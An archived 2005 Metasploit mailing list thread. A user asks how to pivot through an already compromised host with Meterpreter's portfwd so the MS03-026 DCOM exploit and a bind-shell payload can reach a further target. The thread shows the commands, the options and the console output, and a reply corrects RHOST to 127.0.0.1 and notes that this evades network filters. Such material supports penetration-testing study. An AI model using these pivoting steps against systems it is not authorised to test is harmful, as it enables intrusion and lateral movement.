Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

use of meterpreter (copy for the list )

From: thomas.werth at vahle.de (Thomas Werth)
Date: Thu, 14 Apr 2005 10:14:56 +0200
Lets see if i understand correctly :
Exploiting another host and using meterpreter is first i do.
Now the portfwd of meterpreter isn't running on victims host, instead it
is running on "my" host, correct ?
Now i setup portforwading using localhost and next desired target-ip.
When now running attack based on proxy protforwading does it job and
exploit should work , correct ?
Now my question for better understanding :
As portforwading is running on my host and target ip is different from
"proxy Host" why do i need to exploit the proxy host as it seems to me
this host isn't needed when using localhost and next target ip for
"proxy attack " ? How is the "flow of packets" ?
In case of logging on "next target host" which attacker ip will be logged ?

thxs for your help

mmiller at hick.org schrieb:

On Thu, Apr 14, 2005 at 09:10:12AM +0200, Thomas Werth wrote:


1. Exploitet "proxy victim" with metasploit's meterpreter payload.
2. In meterpreter "shell" i'm adding some portfwd's like this :
- portfwd -a -l 9500 -h 'nextTargetIP' -p 135
- portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P //-P is just another
test in hope it will work this time ...
3. now i'm using msrpc exploit with win32_bind payload
Setting Options to

msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

 Exploit:    Name      Default        Description
 --------    ------    -----------    ------------------
 required    RHOST     'ProxyHost'    The target address
 required    RPORT     9500           The target port

 Payload:    Name        Default    Description
 --------    --------    -------
------------------------------------------
 required    EXITFUNC    thread     Exit technique: "process",
"thread", "seh"
 required    LPORT       4444       Listening port for bind shell

 Target: Windows NT SP6/2K/XP/2K3 ALL

4. now launching exploit

msf msrpc_dcom_ms03_026(win32_bind) > exploit

5. that's where it hangs :

[*] Starting Bind Handler.
[*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444

6. Waited long enough, killed connetion with strg-C

Caught interrupt, exit connection? [y/n] y
[*] Exiting Bind Handler.

What am i doing wrong, or isn't it possible to use portfwd so attacks
can be redirected through a proxy ?



The thing to note is that connections are proxied from your local
machine through the meterpreter connection to the target that you are
trying to reach.  In the example you provided above, it appears that you
are expecting the port forwards to be listening on the proxy host that
you initially exploited.  Instead, you should expect the port forward
listeners to be listening on your local machine.  All of the steps you
performed were correct, except instead of using 'ProxyHost' you should
use 127.0.0.1 for RHOST.  I imagine the reason the bind handler got a
connection is because you exploited the 'ProxyHost' with win32_bind
(using port 4444).

The reason connections are proxied starting from your local machine is
because this allows you to transparently bypass any sort of inbound or
outbound filters (since it tunnels through the already established
meterpreter communication channel).

Hope that helps!


-- 
MFG
Thomas Werth

Tel.: 02307 / 704 - 366
---------------------------------------------------------------------

Paul Vahle GmbH & Co. KG              URL       : http://www.vahle.de
Westicker Strasse 52  D-59174 Kamen   E-Mail    : thomas.werth at vahle.de
---------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: